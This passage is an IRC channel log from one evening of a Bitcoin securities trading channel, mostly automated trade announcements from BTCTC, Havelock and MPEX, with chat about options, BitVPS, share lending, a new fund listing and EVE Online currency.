19:39:32 because they are expensive now Jul 11 19:39:42 and bitcoin goes in more than one direction now Jul 11 19:40:12 [BTCTC] [DMS.MINING] 20 @ 0.0151 = 0.302 BTC [-] Jul 11 19:40:24 [BTCTC] [DMS.SELLING] 5 @ 0.035189 = 0.1759 BTC [+] Jul 11 19:41:07 [BTCTC] [DMS.MINING] 1 @ 0.015012 BTC [-] Jul 11 19:41:19 we thought the same in jan ;/ Jul 11 19:41:47 [BTCTC] [DMS.MINING] 3 @ 0.015011 = 0.045 BTC [-] Jul 11 19:42:38 [HAVELOCK] [AM100] 2 @ 0.04288 = 0.0858 BTC [+] Jul 11 19:42:51 [BTCTC] [DMS.MINING] 20 @ 0.01501 = 0.3002 BTC [-] Jul 11 19:43:47 [BTCTC] [DMS.MINING] 20 @ 0.015001 = 0.3 BTC [-] Jul 11 19:43:49 [BTCTC] [DMS.MINING] 5 @ 0.015001 = 0.075 BTC [-] Jul 11 19:43:59 but mpex options ensure cash flow in a volatile market Jul 11 19:44:20 I would think places like bitpay have some kind of insurance while they're liquidating coins for merchants Jul 11 19:44:47 [BTCTC] [DMS.MINING] 4 @ 0.015 = 0.06 BTC [-] Jul 11 19:44:49 [BTCTC] [DMS.MINING] 1 @ 0.015 BTC [-] Jul 11 19:44:49 [BTCTC] [DMS.MINING] 10 @ 0.015 = 0.15 BTC [-] Jul 11 19:45:07 [BTCTC] [DMS.MINING] 1 @ 0.015012 BTC [+] Jul 11 19:46:11 they would need better rates than mpex options though Jul 11 19:46:19 and more custom terms Jul 11 19:47:43 [BTCTC] [DMS.MINING] 11 @ 0.015012 = 0.1651 BTC [+] Jul 11 19:49:07 what's customs term like ? Jul 11 19:49:21 fuckin thunderstorm fried my microtik and my servers nic :\\ Jul 11 19:49:42 kakobrekla they have thunderstorms in russia? Jul 11 19:49:47 :) Jul 11 19:50:00 oops my mistake I meant somalia Jul 11 19:51:58 thunderstorm yest fried my gate control thing Jul 11 19:52:56 [12:49] what's customs term like ? <<< I wouldn't know, but maybe they need things like protection for 1 day, or 5 minutes, rather than monthly Jul 11 19:55:28 [HAVELOCK] [AM100] 78 @ 0.04085 = 3.1863 BTC [-] Jul 11 19:56:19 Sounds a bit extreme Jul 11 19:56:19 [BTCTC] [TAT.ASICMINER] 7 @ 0.043596 = 0.3052 BTC [+] Jul 11 19:56:20 [HAVELOCK] [VTX] 2 @ 0.82 = 1.64 BTC [-] Jul 11 19:57:14 [BTCTC] [S.DICE-PT] 12 @ 0.00232 = 0.0278 BTC [+] Jul 11 19:57:40 Namworld: congrats on bitpay's recovery Jul 11 19:57:45 you guys stuck it the fuck out Jul 11 19:57:56 bitvps* Jul 11 19:57:59 [BTCTC] [DMS.SELLING] 5 @ 0.03475 = 0.1738 BTC [-] Jul 11 19:58:00 !ticker btctc bitvps Jul 11 19:58:02 [BTCT:BITVPS] 1D: 0.001622 / 0.00185 / 0.002099 (4889 shares, 9 BTC), 7D: 0.001102 / 0.00184 / 0.002747 (16971 shares, 31.3 BTC), 30D: 0.000668 / 0.00137 / 0.0035 (52278 shares, 71.7 BTC) Jul 11 19:58:28 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 11 19:59:53 Yes, it's now much easier. Less stuff to worry about. Jul 11 20:00:04 The DC is a bit expensive, but it's a good DC. Jul 11 20:00:28 [BTCTC] [DMS.SELLING] 45 @ 0.035 = 1.575 BTC [+] Jul 11 20:03:42 Tho, props to phungus/arij/d34th which were the sysadmins. Now just arij. Jul 11 20:03:50 [BTCTC] [AMC-PT] 90 @ 0.0025 = 0.225 BTC [+] Jul 11 20:04:12 yea im just the pay per use monkey now Jul 11 20:04:28 you guys stuck it the fuck out << this is a point. Jul 11 20:04:43 [BTCTC] [DMS.MINING] 87 @ 0.015012 = 1.306 BTC [+] Jul 11 20:05:50 Namworld: phungus and d34th quit? Jul 11 20:05:59 d34th seemed pretty peeved a month or so ago Jul 11 20:06:14 yea it was a bad day Jul 11 20:06:34 but i still do the occasional odd job for bitvps Jul 11 20:06:41 ah that's good Jul 11 20:06:53 [HAVELOCK] [AM100] 5 @ 0.040901 = 0.2045 BTC [+] Jul 11 20:06:55 I had a gut feeling Bitvps was going to become profitable this summer. Jul 11 20:07:03 [HAVELOCK] [AM100] 1 @ 0.040901 BTC [+] Jul 11 20:07:22 [HAVELOCK] [AM100] 120 @ 0.040901 = 4.9081 BTC [+] Jul 11 20:07:30 [HAVELOCK] [AM100] 20 @ 0.040901 = 0.818 BTC [+] Jul 11 20:07:37 [HAVELOCK] [AM100] 10 @ 0.040901 = 0.409 BTC [+] Jul 11 20:07:42 [HAVELOCK] [AM100] 1 @ 0.040901 BTC [+] Jul 11 20:07:44 What's this Sandstorm Offering from Havelock? Jul 11 20:07:48 [HAVELOCK] [AM100] 1 @ 0.040851 BTC [-] Jul 11 20:08:13 [HAVELOCK] [AM100] 200 @ 0.04085001 = 8.17 BTC [-] Jul 11 20:08:17 It's a Fund Jul 11 20:08:38 by someone that owns a handful of AM Jul 11 20:08:41 last I checked... Jul 11 20:09:13 looks risky. Jul 11 20:10:04 at least it's only 100btc Jul 11 20:10:13 can't do too much damage I guess... Jul 11 20:10:17 [HAVELOCK] [AM100] 30 @ 0.04077702 = 1.2233 BTC [-] Jul 11 20:10:47 [HAVELOCK] [HIM] 1 @ 0.288 BTC [-] Jul 11 20:12:03 [BTCTC] [AMC-PT] 399 @ 0.0025 = 0.9975 BTC [+] Jul 11 20:13:06 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00449 = 0.2245 BTC [-] Jul 11 20:13:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.043592 = 0.1744 BTC [-] Jul 11 20:14:15 [HAVELOCK] [AM100] 4 @ 0.040851 = 0.1634 BTC [+] Jul 11 20:15:06 [HAVELOCK] [AM100] 1 @ 0.0409 BTC [+] Jul 11 20:15:10 [BTCTC] [S.BBET-PT] 1 @ 0.002175 BTC [+] Jul 11 20:16:13 [BTCTC] [TAT.ASICMINER] 25 @ 0.043593 = 1.0898 BTC [+] Jul 11 20:17:58 [HAVELOCK] [AM100] 2 @ 0.040851 = 0.0817 BTC [-] Jul 11 20:18:43 [HAVELOCK] [AM100] 96 @ 0.040851 = 3.9217 BTC [-] Jul 11 20:18:45 [HAVELOCK] [AM100] 354 @ 0.0409 = 14.4786 BTC [+] Jul 11 20:18:56 [HAVELOCK] [AM100] 5 @ 0.0409 = 0.2045 BTC [+] Jul 11 20:18:59 [HAVELOCK] [AM100] 98 @ 0.0409 = 4.0082 BTC [+] Jul 11 20:19:41 [BTCTC] [AMC-PT] 18 @ 0.0025 = 0.045 BTC [+] Jul 11 20:19:52 [HAVELOCK] [AM1] 1 @ 4.525 BTC [-] Jul 11 20:20:00 [HAVELOCK] [AM1] 1 @ 4.55 BTC [+] Jul 11 20:20:03 [HAVELOCK] [AM100] 18 @ 0.040901 = 0.7362 BTC [+] Jul 11 20:20:38 [HAVELOCK] [AM100] 2 @ 0.04077702 = 0.0816 BTC [-] Jul 11 20:21:02 [HAVELOCK] [AM100] 2 @ 0.04077702 = 0.0816 BTC [-] Jul 11 20:23:51 [BTCTC] [COGNITIVE] 1 @ 0.35 BTC [+] Jul 11 20:24:38 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 11 20:24:49 [HAVELOCK] [AM100] 17 @ 0.042499 = 0.7225 BTC [+] Jul 11 20:26:17 [HAVELOCK] [SDICE] 1 @ 0.180071 BTC [-] Jul 11 20:26:30 [HAVELOCK] [AM100] 10 @ 0.04078 = 0.4078 BTC [-] Jul 11 20:26:33 [HAVELOCK] [AM100] 100 @ 0.04078 = 4.078 BTC [-] Jul 11 20:26:38 [HAVELOCK] [AM100] 5 @ 0.04078 = 0.2039 BTC [-] Jul 11 20:27:29 [HAVELOCK] [AM100] 110 @ 0.040779 = 4.4857 BTC [-] Jul 11 20:27:31 [HAVELOCK] [AM100] 2 @ 0.042499 = 0.085 BTC [+] Jul 11 20:27:33 [BTCTC] [DMS.MINING] 5 @ 0.015899 = 0.0795 BTC [+] Jul 11 20:28:27 [HAVELOCK] [AM100] 2 @ 0.04078 = 0.0816 BTC [-] Jul 11 20:28:29 [HAVELOCK] [AM100] 13 @ 0.040779 = 0.5301 BTC [-] Jul 11 20:30:13 [BTCTC] [AMC-PT] 105 @ 0.0025 = 0.2625 BTC [+] Jul 11 20:30:49 [HAVELOCK] [AM1] 3 @ 4.321 = 12.963 BTC [-] Jul 11 20:31:04 [HAVELOCK] [HIM] 4 @ 0.288 = 1.152 BTC [-] Jul 11 20:31:14 [HAVELOCK] [SDICE] 1 @ 0.19999899 BTC [+] Jul 11 20:32:04 [BTCTC] [TAT.VIRTUALMINE] 276 @ 0.00449 = 1.2392 BTC [-] Jul 11 20:35:18 [BTCTC] [DMS.SELLING] 2 @ 0.035 = 0.07 BTC [+] Jul 11 20:36:21 [HAVELOCK] [AM100] 41 @ 0.042495 = 1.7423 BTC [+] Jul 11 20:43:11 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 11 20:44:18 [BTCTC] [BASIC-MINING] 10 @ 0.381001 = 3.81 BTC [-] Jul 11 20:45:22 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 11 20:48:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.043589 = 0.0872 BTC [-] Jul 11 20:49:13 [HAVELOCK] [HIM] 8 @ 0.288 = 2.304 BTC [-] Jul 11 20:49:21 [HAVELOCK] [HIM] 6 @ 0.288 = 1.728 BTC [-] Jul 11 20:50:33 [MPEX] [S.MPOE] 3450 @ 0.00081277 = 2.8041 BTC [+] Jul 11 20:50:35 [MPEX] [S.MPOE] 5176 @ 0.00081354 = 4.2109 BTC [+] Jul 11 20:50:48 [MPEX] [S.MPOE] 8074 @ 0.00081432 = 6.5748 BTC [+] Jul 11 20:52:31 [BTCTC] [BFMINES] 68 @ 0.003996 = 0.2717 BTC [-] Jul 11 20:52:32 [HAVELOCK] [SDSTM] 1 @ 0.01 BTC Jul 11 20:55:36 [HAVELOCK] [SDSTM] 1 @ 0.01 BTC Jul 11 20:59:06 [BTCTC] [TAT.ASICMINER] 15 @ 0.043589 = 0.6538 BTC [-] Jul 11 20:59:47 [HAVELOCK] [SDSTM] 3 @ 0.01 = 0.03 BTC Jul 11 21:00:03 [HAVELOCK] [SDSTM] 95 @ 0.01 = 0.95 BTC Jul 11 21:00:28 hmmm, the bot pulled its options... Jul 11 21:00:28 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [-] Jul 11 21:00:30 [BTCTC] [ASICMINER-PT] 1 @ 4.230011 BTC [-] Jul 11 21:00:32 [BTCTC] [ASICMINER-PT] 1 @ 4.23001 BTC [-] Jul 11 21:00:34 [BTCTC] [ASICMINER-PT] 1 @ 4.23 BTC [-] Jul 11 21:00:36 [BTCTC] [ASICMINER-PT] 1 @ 4.225 BTC [-] Jul 11 21:00:38 [BTCTC] [ASICMINER-PT] 1 @ 4.22001 BTC [-] Jul 11 21:00:40 [HAVELOCK] [AM100] 4 @ 0.040779 = 0.1631 BTC [-] Jul 11 21:00:40 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 11 21:00:42 [BTCTC] [ASICMINER-PT] 3 @ 4.203031 = 12.6091 BTC [-] Jul 11 21:00:44 [BTCTC] [ASICMINER-PT] 2 @ 4.20303 = 8.4061 BTC [-] Jul 11 21:00:46 [BTCTC] [ASICMINER-PT] 6 @ 4.20202 = 25.2121 BTC [-] Jul 11 21:00:48 [BTCTC] [ASICMINER-PT] 1 @ 4.202 BTC [-] Jul 11 21:00:50 [BTCTC] [ASICMINER-PT] 1 @ 4.201001 BTC [-] Jul 11 21:00:52 [BTCTC] [ASICMINER-PT] 1 @ 4.201 BTC [-] Jul 11 21:00:54 [BTCTC] [ASICMINER-PT] 3 @ 4.2002 = 12.6006 BTC [-] Jul 11 21:00:56 [BTCTC] [ASICMINER-PT] 1 @ 4.200011 BTC [-] Jul 11 21:00:57 [BTCTC] [ASICMINER-PT] 5 @ 4.2 = 21 BTC [-] Jul 11 21:01:39 [HAVELOCK] [SDSTM] 14 @ 0.0108 = 0.1512 BTC [+] Jul 11 21:01:39 [HAVELOCK] [SDSTM] 86 @ 0.010501 = 0.9031 BTC [-] Jul 11 21:02:40 [BTCTC] [BITVPS] 45 @ 0.0018 = 0.081 BTC [-] Jul 11 21:02:54 When did SDSTM IPO? Jul 11 21:03:07 sup Namworld Jul 11 21:03:11 how's it going Jul 11 21:03:19 did you guys ever decide on those puts, etc? Jul 11 21:03:28 nope Jul 11 21:03:35 i'm with you on that Jul 11 21:03:35 [HAVELOCK] [SDSTM] 1 @ 0.01209086 BTC [+] Jul 11 21:03:43 i wonder if we could talk to jurov Jul 11 21:03:48 about possibly lending shares Jul 11 21:03:53 through a brokerage Jul 11 21:03:58 to collect revenue Jul 11 21:04:08 after all, if you trust him with your shit in the first place Jul 11 21:04:11 Namworld: it hasnt yet Jul 11 21:04:21 but it was pre-loaded with the offsite investors Jul 11 21:04:26 he can easily let a guy sell shares (its all one account to mircea_popescu) Jul 11 21:04:30 which are now trading at 10x-100x the ipo rate Jul 11 21:04:42 im thinking of shutting down trading on it until after the ipo Jul 11 21:04:52 [BTCTC] [DMS.PURCHASE] 155 @ 0.048759 = 7.5576 BTC [-] Jul 11 21:04:55 Well that's really... retarded... don't people read at all? Jul 11 21:04:58 probly should have given private investors their shares after the ipo Jul 11 21:05:00 so he has a big pool of shares, and could let people check them as available for borrow Jul 11 21:06:05 good way to boost volume Jul 11 21:06:10 [HAVELOCK] [SDSTM] 4 @ 0.01208986 = 0.0484 BTC [-] Jul 11 21:06:11 and maybe more liquidity Jul 11 21:06:29 [BTCTC] [S.DICE-PT] 88 @ 0.00232 = 0.2042 BTC [+] Jul 11 21:06:30 kinda how prime brokerage works irl Jul 11 21:06:35 yes Jul 11 21:06:37 exactly Jul 11 21:06:46 although usually you have to go through a whole locate broker Jul 11 21:06:47 [HAVELOCK] [SDSTM] 30 @ 0.01208986 = 0.3627 BTC [-] Jul 11 21:06:55 [BTCTC] [DMS.SELLING] 1 @ 0.035 BTC [+] Jul 11 21:07:00 assent being the biggest example of someone specializing in locates Jul 11 21:07:05 or at least it was Jul 11 21:07:45 but for anyone to be able to do it, they need a customer base, or a ton of capital Jul 11 21:07:50 so jurov is perfect Jul 11 21:07:56 [BTCTC] [S.DICE-PT] 100 @ 0.002325 = 0.2325 BTC [+] Jul 11 21:08:08 as he has probably a ton of different assets, that most long term investors are just sitting on Jul 11 21:08:10 [HAVELOCK] [SDSTM] 1 @ 0.0108 BTC [-] Jul 11 21:08:14 pure speculation on my part Jul 11 21:08:28 [BTCTC] [COGNITIVE] 4 @ 0.35 = 1.4 BTC [+] Jul 11 21:08:33 i don't know of a bigger mpex broker though Jul 11 21:08:36 [BTCTC] [S.DICE-PT] 100 @ 0.00233 = 0.233 BTC [+] Jul 11 21:08:55 [BTCTC] [S.DICE-PT] 100 @ 0.002335 = 0.2335 BTC [+] Jul 11 21:09:06 [BTCTC] [TAT.ASICMINER] 15 @ 0.04261 = 0.6392 BTC [-] Jul 11 21:09:35 [BTCTC] [S.DICE-PT] 163 @ 0.002336 = 0.3808 BTC [+] Jul 11 21:15:21 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.004001 = 0.06 BTC [-] Jul 11 21:15:30 [HAVELOCK] [AM1] 1 @ 4.55 BTC [+] Jul 11 21:15:32 [HAVELOCK] [AM100] 23 @ 0.041999 = 0.966 BTC [+] Jul 11 21:16:15 [BTCTC] [COGNITIVE] 2 @ 0.358001 = 0.716 BTC [+] Jul 11 21:16:47 [BTCTC] [S.DICE-PT] 132 @ 0.002339 = 0.3087 BTC [+] Jul 11 21:17:25 [BTCTC] [S.DICE-PT] 8 @ 0.00234 = 0.0187 BTC [+] Jul 11 21:17:25 i heard a rumor that there were some big blocks of sdice moving around... Jul 11 21:17:50 [BTCTC] [S.DICE-PT] 200 @ 0.002375 = 0.475 BTC [+] Jul 11 21:18:03 anyone know if there is any truth to that? Jul 11 21:19:09 No clue Jul 11 21:19:33 hmm Jul 11 21:19:58 Ukto: Jul 11 21:20:13 ;;later tell Ukto I bought FFVII on Steam for 11 bucks :P Jul 11 21:20:13 The operation succeeded. Jul 11 21:20:21 [BTCTC] [DMS.PURCHASE] 46 @ 0.048759 = 2.2429 BTC [-] Jul 11 21:20:39 I wanted to buy that. Jul 11 21:20:49 [HAVELOCK] [AM100] 123 @ 0.041999 = 5.1659 BTC [+] Jul 11 21:21:09 you wanted to buy FFVII? Jul 11 21:21:40 [BTCTC] [S.DICE-PT] 593 @ 0.00238 = 1.4113 BTC [+] Jul 11 21:21:57 [HAVELOCK] [HIM] 33 @ 0.2888888 = 9.5333 BTC [+] Jul 11 21:22:33 [MPEX] [S.MPOE] 726 @ 0.00081432 = 0.5912 BTC [+] Jul 11 21:22:34 [MPEX] [S.MPOE] 1874 @ 0.00081504 = 1.5274 BTC [+] Jul 11 21:23:48 [BTCTC] [ASICMINER-PT] 1 @ 4.378998 BTC [+] Jul 11 21:23:59 yeah Jul 11 21:25:00 [BTCTC] [S.DICE-PT] 1300 @ 0.002384 = 3.0992 BTC [+] Jul 11 21:25:25 [BTCTC] [BASIC-MINING] 3 @ 0.399899 = 1.1997 BTC [+] Jul 11 21:25:39 [HAVELOCK] [SDICE] 4 @ 0.195 = 0.78 BTC [-] Jul 11 21:25:40 [HAVELOCK] [SDICE] 10 @ 0.19999999 = 2 BTC [+] Jul 11 21:25:42 [HAVELOCK] [SDICE] 30 @ 0.205 = 6.15 BTC [+] Jul 11 21:26:51 [HAVELOCK] [SDICE] 1 @ 0.205 BTC [+] Jul 11 21:28:09 [BTCTC] [AMC-PT] 100 @ 0.002499 = 0.2499 BTC [-] Jul 11 21:28:44 yes I feel like a fool for selling my basic shares at .16 now Jul 11 21:28:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.04261 = 0.0852 BTC [-] Jul 11 21:28:53 [BTCTC] [TAT.ASICMINER] 45 @ 0.042609 = 1.9174 BTC [-] Jul 11 21:30:18 [BTCTC] [AMC-PT] 1500 @ 0.0025 = 3.75 BTC [+] Jul 11 21:30:58 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 11 21:31:48 [BTCTC] [TAT.ASICMINER] 30 @ 0.0435 = 1.305 BTC [+] Jul 11 21:32:40 [HAVELOCK] [AM100] 18 @ 0.042 = 0.756 BTC [+] Jul 11 21:32:48 [HAVELOCK] [AM100] 5 @ 0.0421 = 0.2105 BTC [+] Jul 11 21:32:49 So what did I miss with the huge jump in Basic? Jul 11 21:33:42 [BTCTC] [BASIC-MINING] 2 @ 0.399899 = 0.7998 BTC [+] Jul 11 21:35:21 [MPEX] [X.IDIFF.SEP] 542 @ 0.55 = 298.1 BTC [+] Jul 11 21:35:55 damn Jul 11 21:36:22 [BTCTC] [ASICMINER-PT] 1 @ 4.31 BTC [-] Jul 11 21:37:03 [MPEX] [O.USD.P095T] 715 @ 0.1239663 = 88.6359 BTC [-] Jul 11 21:40:15 [BTCTC] [DMS.MINING] 8 @ 0.0149 = 0.1192 BTC [-] Jul 11 21:40:17 [BTCTC] [DMS.MINING] 50 @ 0.0148 = 0.74 BTC [-] Jul 11 21:40:18 [BTCTC] [DMS.MINING] 50 @ 0.0147 = 0.735 BTC [-] Jul 11 21:40:38 [HAVELOCK] [AM100] 25 @ 0.041021 = 1.0255 BTC [-] Jul 11 21:41:14 [BTCTC] [DMS.MINING] 9 @ 0.0146 = 0.1314 BTC [-] Jul 11 21:41:26 [BTCTC] [AMC-PT] 20 @ 0.0024 = 0.048 BTC [-] Jul 11 21:41:42 [BTCTC] [ASICMINER-PT] 1 @ 4.31 BTC [-] Jul 11 21:43:17 [BTCTC] [TAT.ASICMINER] 22 @ 0.043497 = 0.9569 BTC [-] Jul 11 21:44:09 [BTCTC] [DMS.PURCHASE] 12 @ 0.048759 = 0.5851 BTC [-] Jul 11 21:45:16 [BTCTC] [DMS.MINING] 41 @ 0.0146 = 0.5986 BTC [-] Jul 11 21:45:54 [BTCTC] [BASIC-MINING] 2 @ 0.399899 = 0.7998 BTC [+] Jul 11 21:46:03 [BTCTC] [ASICMINER-PT] 1 @ 4.37 BTC [+] Jul 11 21:48:51 [BTCTC] [DMS.MINING] 8 @ 0.0145 = 0.116 BTC [-] Jul 11 21:49:22 [HAVELOCK] [AM1] 3 @ 4.55 = 13.65 BTC [+] Jul 11 21:52:08 [BTCTC] [BASIC-MINING] 3 @ 0.399899 = 1.1997 BTC [+] Jul 11 21:52:10 [BTCTC] [BASIC-MINING] 7 @ 0.3999 = 2.7993 BTC [+] Jul 11 21:52:36 [BTCTC] [DMS.PURCHASE] 33 @ 0.048759 = 1.609 BTC [-] Jul 11 21:54:15 heeey, is anyone here involved with BitBet? I have a few questions Jul 11 21:55:15 If anyone knows anything about the API it'd be cool to chat! Jul 11 21:55:32 [BTCTC] [DMS.MINING] 42 @ 0.0145 = 0.609 BTC [-] Jul 11 21:55:34 [BTCTC] [DMS.MINING] 50 @ 0.0144 = 0.72 BTC [-] Jul 11 21:55:58 [BTCTC] [DMS.MINING] 20 @ 0.01412 = 0.2824 BTC [-] Jul 11 21:56:00 [BTCTC] [DMS.MINING] 20 @ 0.01412 = 0.2824 BTC [-] Jul 11 21:56:26 breeezzz see pm Jul 11 21:56:30 or not Jul 11 21:56:38 lol Jul 11 21:57:28 [MPEX] [S.DICE] 242 @ 0.00239999 = 0.5808 BTC [-] Jul 11 22:00:25 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004151 = 0.4151 BTC [+] Jul 11 22:00:27 [BTCTC] [TAT.VIRTUALMINE] 250 @ 0.00415 = 1.0375 BTC [-] Jul 11 22:01:15 [BTCTC] [ASICMINER-PT] 1 @ 4.36 BTC [-] Jul 11 22:01:37 [BTCTC] [DMS.MINING] 1 @ 0.0145 BTC [+] Jul 11 22:03:46 [HAVELOCK] [HIM] 20 @ 0.2876 = 5.752 BTC [-] Jul 11 22:03:48 [MPEX] [S.MPOE] 13076 @ 0.00081504 = 10.6575 BTC [+] Jul 11 22:03:49 [MPEX] [S.MPOE] 2574 @ 0.00081512 = 2.0981 BTC [+] Jul 11 22:03:51 [HAVELOCK] [AM100] 4 @ 0.042148 = 0.1686 BTC [+] Jul 11 22:07:13 [HAVELOCK] [AM100] 59 @ 0.04121 = 2.4314 BTC [-] Jul 11 22:08:07 [HAVELOCK] [AM100] 9 @ 0.042148 = 0.3793 BTC [+] Jul 11 22:09:25 [BTCTC] [DMS.SELLING] 4 @ 0.034998 = 0.14 BTC [-] Jul 11 22:11:37 [BTCTC] [BASIC-MINING] 1 @ 0.399899 BTC [-] Jul 11 22:11:57 HI PPL I HAVE A QUESTION ILL LOGOFF IN 30 SECONDS PLS ANSWER ME TY Jul 11 22:12:19 he will be back Jul 11 22:12:23 a ok Jul 11 22:12:57 in other news i just fucked up ~50 mn isk worth of eve gear. Jul 11 22:13:54 how much btc is that? Jul 11 22:14:53 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00425 = 0.0085 BTC [+] Jul 11 22:15:02 4672 Jul 11 22:15:04 around Jul 11 22:15:07 like 0.05 Jul 11 22:15:18 huh? Jul 11 22:15:29 about 1 btc to 100mn isk actually Jul 11 22:15:30 so like .54 Jul 11 22:15:33 .5* Jul 11 22:15:45 holy shit! Jul 11 22:15:51 1 isk = 1 satoshi! omfg. Jul 11 22:16:30 ah, i went from isk (krona) to dollars (123 per) Jul 11 22:16:30 iskception Jul 11 22:16:41 then from dollars to btc at 87 Jul 11 22:16:58 [BTCTC] [COGNITIVE] 1 @ 0.36 BTC [+] Jul 11 22:17:00 [BTCTC] [COGNITIVE] 1 @ 0.36 BTC [+] Jul 11 22:17:01 [BTCTC] [COGNITIVE] 1 @ 0.36 BTC [+] Jul 11 22:17:26 [BTCTC] [COGNITIVE] 2 @ 0.366 = 0.732 BTC [+] Jul 11 22:17:40 and they just print these isks? Jul 11 22:17:56 i want to print some isks Jul 11 22:18:05 lol, oh is isk an in game currency? Jul 11 22:18:10 yeah Jul 11 22:18:13 i thought it was icelandic krona Jul 11 22:18:16 [BTCTC] [COGNITIVE] 3 @ 0.375 = 1.125 BTC [+] Jul 11 22:18:26 no wait, i was right the fgirst time Jul 11 22:18:30 its 1bn isk to the btc Jul 11 22:18:36 kakobrekla pretty much yes Jul 11 22:18:38 [BTCTC] [COGNITIVE] 2 @ 0.38 = 0.76 BTC [+] Jul 11 22:18:56 mjr_ nah, it's eve currency, isk. who cares about iceland :D Jul 11 22:18:56 good biz Jul 11 22:19:24 [BTCTC] [COGNITIVE] 4 @ 0.3975 = 1.59 BTC [+] Jul 11 22:20:38 [BTCTC] [AMC-PT] 1 @ 0.002499 BTC [+] Jul 11 22:21:46 lol Jul 11 22:21:54 icelandic people i'd assume Jul 11 22:22:04 but not many others Jul 11 22:22:49 [BTCTC] [DMS.SELLING] 10 @ 0.034997 = 0.35 BTC [-] Jul 11 22:24:07 I just got a fax that two billion dollar companies wanna buy my IRL business... Jul 11 22:24:11 lol Jul 11 22:24:28 ThickAsThieves: NICE Jul 11 22:24:43 wtf kinda scam is this Jul 11 22:24:48 faxing people Jul 11 22:27:54 [BTCTC] [S.MPOE-PT] 74 @ 0.000945 = 0.0699 BTC [+] Jul 11 22:28:42 you have a fax machine? Jul 11 22:28:54 efax Jul 11 22:29:00 i have a fax number Jul 11 22:29:02 no machine Jul 11 22:29:03 Fair enough Jul 11 22:30:56 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.004249 = 0.0255 BTC [-] Jul 11 22:31:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.04261 = 0.0852 BTC [-] Jul 11 22:31:03 [BTCTC] [TAT.ASICMINER] 13 @ 0.043299 = 0.5629 BTC [+] Jul 11 22:34:34 efax was always a scam iirc Jul 11 22:34:38 for a decade or so Jul 11 22:35:53 [BTCTC] [AMC-PT] 25 @ 0.002499 = 0.0625 BTC [+] Jul 11 22:37:26 ThickAsThieves: can I send you a fax Jul 11 22:37:50 [BTCTC] [PAJKA.BOND] 1 @ 0.049 BTC [-] Jul 11 22:38:37 [MPEX] [S.MPOE] 743 @ 0.00081578 = 0.6061 BTC [+] Jul 11 22:38:39 [MPEX] [S.MPOE] 12357 @ 0.00081512 = 10.0724 BTC [-] Jul 11 22:39:02 [BTCTC] [PAJKA.BOND] 2 @ 0.047009 = 0.094 BTC [-] Jul 11 22:39:43 [BTCTC] [AMC-PT] 144 @ 0.002401 = 0.3457 BTC [-] Jul 11 22:40:15 [BTCTC] [BASIC-MINING] 1 @ 0.399889 BTC [-] Jul 11 22:40:51 [HAVELOCK] [HIM] 2 @ 0.275001 = 0.55 BTC [-] Jul 11 22:43:58 [BTCTC] [DMS.MINING] 1 @ 0.0146 BTC [+] Jul 11 22:43:58 [BTCTC] [DMS.MINING] 3 @ 0.014101 = 0.0423 BTC [-] Jul 11 22:45:28 [BTCTC] [ASICMINER-PT] 3 @ 4.378821 = 13.1365 BTC [+] Jul 11 22:45:29 [BTCTC] [BITVPS] 1 @ 0.001841 BTC [+] Jul 11 22:45:31 [BTCTC] [BITVPS] 250 @ 0.001842 = 0.4605 BTC [+] Jul 11 22:46:02 [BTCTC] [ASICMINER-PT] 2 @ 4.378821 = 8.7576 BTC [+] Jul 11 22:46:42 [BTCTC] [ASICMINER-PT] 1 @ 4.378999 BTC [+] Jul 11 22:46:54 [BTCTC] [BITVPS] 3 @ 0.001899 = 0.0057 BTC [+] Jul 11 22:47:08 [BTCTC] [DMS.MINING] 17 @ 0.014101 = 0.2397 BTC [-] Jul 11 22:47:09 [BTCTC] [ASICMINER-PT] 6 @ 4.388992 = 26.334 BTC [+] Jul 11 22:47:11 [BTCTC] [DMS.MINING] 1 @ 0.014101 BTC [-] Jul 11 22:47:27 [BTCTC] [ASICMINER-PT] 1 @ 4.388993 BTC [+] Jul 11 22:47:44 [BTCTC] [ASICMINER-PT] 1 @ 4.3891 BTC [+] Jul 11 22:48:00 [BTCTC] [ASICMINER-PT] 1 @ 4.389998 BTC [+] Jul 11 22:48:19 [BTCTC] [ASICMINER-PT] 11 @ 4.39 = 48.29 BTC [+] Jul 11 22:48:32 [BTCTC] [BITVPS] 59 @ 0.001899 = 0.112 BTC [+] Jul 11 22:48:39 [BTCTC] [ASICMINER-PT] 1 @ 4.392999 BTC [+] Jul 11 22:48:57 [BTCTC] [ASICMINER-PT] 3 @ 4.39887 = 13.1966 BTC [+] Jul 11 22:49:29 [BTCTC] [ASICMINER-PT] 1 @ 4.39888 BTC [+] Jul 11 22:49:40 [BTCTC] [BITVPS] 3 @ 0.001704 = 0.0051 BTC [-] Jul 11 22:49:52 [BTCTC] [ASICMINER-PT] 2 @ 4.3999 = 8.7998 BTC [+] Jul 11 22:50:04 [BTCTC] [BITVPS] 142 @ 0.001899 = 0.2697 BTC [+] Jul 11 22:50:06 [BTCTC] [BITVPS] 40 @ 0.0019 = 0.076 BTC [+] Jul 11 22:50:09 [BTCTC] [BITVPS] 220 @ 0.0019 = 0.418 BTC [+] Jul 11 22:50:31 [BTCTC] [ASICMINER-PT] 5 @ 4.4 = 22 BTC [+] Jul 11 22:50:33 [BTCTC] [ASICMINER-PT] 5 @ 4.4 = 22 BTC [+] Jul 11 22:51:49 [BTCTC] [TAT.ASICMINER] 33 @ 0.043299 = 1.4289 BTC [+] Jul 11 22:52:10 [BTCTC] [RSM] 41 @ 0.013 = 0.533 BTC [+] Jul 11 22:52:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.043499 BTC [+] Jul 11 22:53:43 